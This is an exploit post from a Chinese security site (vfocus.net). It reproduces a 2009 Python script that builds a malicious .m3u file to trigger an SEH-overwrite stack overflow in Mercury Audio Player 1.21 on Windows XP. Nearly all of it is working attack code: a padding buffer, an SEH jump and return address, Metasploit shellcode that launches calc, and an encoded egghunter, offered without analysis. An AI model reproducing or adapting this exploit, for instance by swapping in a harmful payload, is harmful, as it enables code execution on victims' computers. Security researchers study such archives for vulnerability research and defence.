Mercury Audio Player 1.21 (.m3u) Local Stack Overflow Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Mercury Audio Player 1.21 (.m3u) Local Stack Overflow Exploit

来源：vfocus.net 作者：vfocus 发布时间：2009-05-04

#usage: exploit.py
#Note : Exploit take about 30 seconds to work.
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
print "**************************************************************************"

         	
buff = "\x41" * 16740
next_seh = "\xEB\x06\x41\x42"
seh = "\xB8\x15\xD1\x72" #msacm32.drv


# win32_exec -  EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
shellcode = (
"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xd1\xdc"
"\x59\x83\xeb\xfc\xe2\xf4\xde\x39\x98\x59\x22\xd1\x57\x1c\x1e\x5a"
"\xa0\x5c\x5a\xd0\x33\xd2\x6d\xc9\x57\x06\x02\xd0\x37\x10\xa9\xe5"
"\x57\x58\xcc\xe0\x1c\xc0\x8e\x55\x1c\x2d\x25\x10\x16\x54\x23\x13"
"\x37\xad\x19\x85\xf8\x5d\x57\x34\x57\x06\x06\xd0\x37\x3f\xa9\xdd"
"\x97\xd2\x7d\xcd\xdd\xb2\xa9\xcd\x57\x58\xc9\x58\x80\x7d\x26\x12"
"\xed\x99\x46\x5a\x9c\x69\xa7\x11\xa4\x55\xa9\x91\xd0\xd2\x52\xcd"
"\x71\xd2\x4a\xd9\x37\x50\xa9\x51\x6c\x59\x22\xd1\x57\x31\x1e\x8e"
"\xed\xaf\x42\x87\x55\xa1\xa1\x11\xa7\x09\x4a\x21\x56\x5d\x7d\xb9"
"\x44\xa7\xa8\xdf\x8b\xa6\xc5\xb2\xbd\x35\x41\xd1\xdc\x59")

#[*] x86/alpha_mixed succeeded with size 126 (iteration=1)
egghunter=(
"\x89\xe5\xda\xd9\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x45\x36\x4d\x51\x48\x4a\x4b\x4f\x44\x4f\x51\x52\x46\x32\x42"
"\x4a\x45\x52\x46\x38\x48\x4d\x46\x4e\x47\x4c\x45\x55\x51\x4a"
"\x44\x34\x4a\x4f\x48\x38\x47\x34\x50\x5a\x50\x32\x50\x37\x4c"
"\x4b\x4b\x4a\x4e\x4f\x43\x45\x4b\x5a\x4e\x4f\x42\x55\x4b\x57"
"\x4b\x4f\x4d\x37\x41\x41")

exploit = buff + shellcode + next_seh + seh + egghunter + "\x90"*7

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit+".mp3")
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# [2009-05-01]

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告